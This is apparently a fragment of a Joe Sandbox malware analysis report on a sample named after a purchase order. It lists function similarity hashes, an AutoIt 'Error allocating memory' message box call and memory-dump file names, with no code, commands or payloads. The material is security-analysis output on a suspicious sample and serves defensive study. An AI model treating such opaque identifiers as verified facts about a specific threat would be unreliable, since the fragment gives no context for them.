                      • API ID: FindMessagePostSleepWindow
                      • String ID: Shell_TrayWnd
                      • API String ID: 529655941-2988720461
                      • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                      • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                      • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                      • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                      APIs
                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                        • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Message_doexit
                      • String ID: AutoIt$Error allocating memory.
                      • API String ID: 1993061046-4017498283
                      • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                      • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                      • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                      • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D